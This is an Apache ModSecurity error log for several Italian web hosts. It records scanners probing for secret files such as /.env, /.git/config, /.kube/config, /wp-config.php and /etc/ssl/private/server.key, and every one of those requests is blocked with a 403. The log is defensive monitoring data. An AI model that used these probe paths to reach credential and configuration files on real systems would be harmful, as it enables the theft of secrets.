[Sun May 19 01:47:45.034516 2024] [:error] [pid 3321201] [client 213.152.176.252:2349] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zkk-Ie245Qo6tNg9hzo3FwAAACA"]
[Sun May 19 01:47:45.034689 2024] [:error] [pid 3321201] [client 213.152.176.252:2349] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zkk-Ie245Qo6tNg9hzo3FwAAACA"]
[Sun May 19 01:47:45.188461 2024] [:error] [pid 3322724] [client 213.232.87.228:13851] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Zkk-IV9kLRmhEhWGL4_lcwAAAAE"]
[Sun May 19 01:47:45.188702 2024] [:error] [pid 3322724] [client 213.232.87.228:13851] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Zkk-IV9kLRmhEhWGL4_lcwAAAAE"]
[Sun May 19 01:47:45.188866 2024] [:error] [pid 3322724] [client 213.232.87.228:13851] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Zkk-IV9kLRmhEhWGL4_lcwAAAAE"]
[Sun May 19 01:47:45.275097 2024] [:error] [pid 3322724] [client 213.232.87.228:56109] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zkk-IV9kLRmhEhWGL4_ldAAAAAE"]
[Sun May 19 01:47:45.275515 2024] [:error] [pid 3322724] [client 213.232.87.228:56109] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zkk-IV9kLRmhEhWGL4_ldAAAAAE"]
[Sun May 19 01:47:45.275696 2024] [:error] [pid 3322724] [client 213.232.87.228:56109] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zkk-IV9kLRmhEhWGL4_ldAAAAAE"]
[Sun May 19 01:47:45.995876 2024] [:error] [pid 3322731] [client 213.232.87.228:6963] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Zkk-IUNcx6VRyUyW1n2pYAAAAAI"]
[Sun May 19 01:47:45.996205 2024] [:error] [pid 3322731] [client 213.232.87.228:6963] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Zkk-IUNcx6VRyUyW1n2pYAAAAAI"]
[Sun May 19 01:47:45.996366 2024] [:error] [pid 3322731] [client 213.232.87.228:6963] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Zkk-IUNcx6VRyUyW1n2pYAAAAAI"]
[Sun May 19 01:47:46.245164 2024] [:error] [pid 3322735] [client 213.232.87.228:7201] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zkk-IiHTsCBd2hH3Kd0P6QAAAAU"]
[Sun May 19 01:47:46.245449 2024] [:error] [pid 3322735] [client 213.232.87.228:7201] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zkk-IiHTsCBd2hH3Kd0P6QAAAAU"]
[Sun May 19 01:47:46.245639 2024] [:error] [pid 3322735] [client 213.232.87.228:7201] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zkk-IiHTsCBd2hH3Kd0P6QAAAAU"]
[Tue May 21 09:24:32.366973 2024] [:error] [pid 3367148] [client 179.43.188.122:59152] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkxMMNh3qxUqU3tLGd62HAAAAAI"]
[Tue May 21 09:24:32.367780 2024] [:error] [pid 3367148] [client 179.43.188.122:59152] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkxMMNh3qxUqU3tLGd62HAAAAAI"]
[Tue May 21 09:24:32.368233 2024] [:error] [pid 3367148] [client 179.43.188.122:59152] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkxMMNh3qxUqU3tLGd62HAAAAAI"]
[Wed May 22 01:08:40.859938 2024] [:error] [pid 3386918] [client 103.102.228.131:42242] [client 103.102.228.131] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk0peHwrkUJqQ_kVbaf-LAAAAAI"]
[Wed May 22 01:08:40.860775 2024] [:error] [pid 3386918] [client 103.102.228.131:42242] [client 103.102.228.131] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk0peHwrkUJqQ_kVbaf-LAAAAAI"]
[Wed May 22 01:08:40.861201 2024] [:error] [pid 3386918] [client 103.102.228.131:42242] [client 103.102.228.131] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk0peHwrkUJqQ_kVbaf-LAAAAAI"]
[Wed May 22 02:56:39.973360 2024] [:error] [pid 3386921] [client 44.197.213.90:44238] [client 44.197.213.90] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Zk1CxwfvAATz6hMuJ8jHQAAAAAU"]
[Wed May 22 02:56:39.973967 2024] [:error] [pid 3386921] [client 44.197.213.90:44238] [client 44.197.213.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Zk1CxwfvAATz6hMuJ8jHQAAAAAU"]
[Wed May 22 02:56:39.974412 2024] [:error] [pid 3386921] [client 44.197.213.90:44238] [client 44.197.213.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Zk1CxwfvAATz6hMuJ8jHQAAAAAU"]
[Wed May 22 07:13:27.827056 2024] [authz_core:error] [pid 3395359] [client 46.101.1.225:46324] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed May 22 07:13:28.236197 2024] [:error] [pid 3395392] [client 46.101.1.225:46358] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zk1--IxthpOCBUxc2u8ZxAAAAAY"]
[Wed May 22 07:13:28.236808 2024] [:error] [pid 3395392] [client 46.101.1.225:46358] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zk1--IxthpOCBUxc2u8ZxAAAAAY"]
[Wed May 22 07:13:28.237223 2024] [:error] [pid 3395392] [client 46.101.1.225:46358] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zk1--IxthpOCBUxc2u8ZxAAAAAY"]
[Wed May 22 07:13:28.329380 2024] [:error] [pid 3395392] [client 46.101.1.225:46362] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zk1--IxthpOCBUxc2u8ZxQAAAAY"]
[Wed May 22 07:13:28.329842 2024] [:error] [pid 3395392] [client 46.101.1.225:46362] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zk1--IxthpOCBUxc2u8ZxQAAAAY"]
[Wed May 22 07:13:28.330303 2024] [:error] [pid 3395392] [client 46.101.1.225:46362] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zk1--IxthpOCBUxc2u8ZxQAAAAY"]
[Wed May 22 07:13:28.422369 2024] [:error] [pid 3395360] [client 46.101.1.225:46376] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk1--FQmnWT4N4NxlYdmFAAAAAM"]
[Wed May 22 07:13:28.422869 2024] [:error] [pid 3395360] [client 46.101.1.225:46376] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk1--FQmnWT4N4NxlYdmFAAAAAM"]
[Wed May 22 07:13:28.423278 2024] [:error] [pid 3395360] [client 46.101.1.225:46376] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk1--FQmnWT4N4NxlYdmFAAAAAM"]
[Wed May 22 07:16:15.891550 2024] [:error] [pid 3395394] [client 34.222.118.220:49536] [client 34.222.118.220] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk1_nxy_kxE0Cryukh32bwAAAAg"]
[Wed May 22 07:16:15.892079 2024] [:error] [pid 3395394] [client 34.222.118.220:49536] [client 34.222.118.220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk1_nxy_kxE0Cryukh32bwAAAAg"]
[Wed May 22 07:16:15.892460 2024] [:error] [pid 3395394] [client 34.222.118.220:49536] [client 34.222.118.220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zk1_nxy_kxE0Cryukh32bwAAAAg"]
[Wed May 22 09:06:55.807048 2024] [:error] [pid 3395392] [client 18.200.247.85:52204] [client 18.200.247.85] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk2Zj4xthpOCBUxc2u8ZyQAAAAY"]
[Wed May 22 09:06:55.807867 2024] [:error] [pid 3395392] [client 18.200.247.85:52204] [client 18.200.247.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk2Zj4xthpOCBUxc2u8ZyQAAAAY"]
[Wed May 22 09:06:55.808324 2024] [:error] [pid 3395392] [client 18.200.247.85:52204] [client 18.200.247.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zk2Zj4xthpOCBUxc2u8ZyQAAAAY"]
[Wed May 22 09:56:52.709721 2024] [:error] [pid 3395359] [client 91.215.85.43:36810] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /amphtml/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "Zk2lRJTMfOoR75vS6_DpQAAAAAI"]
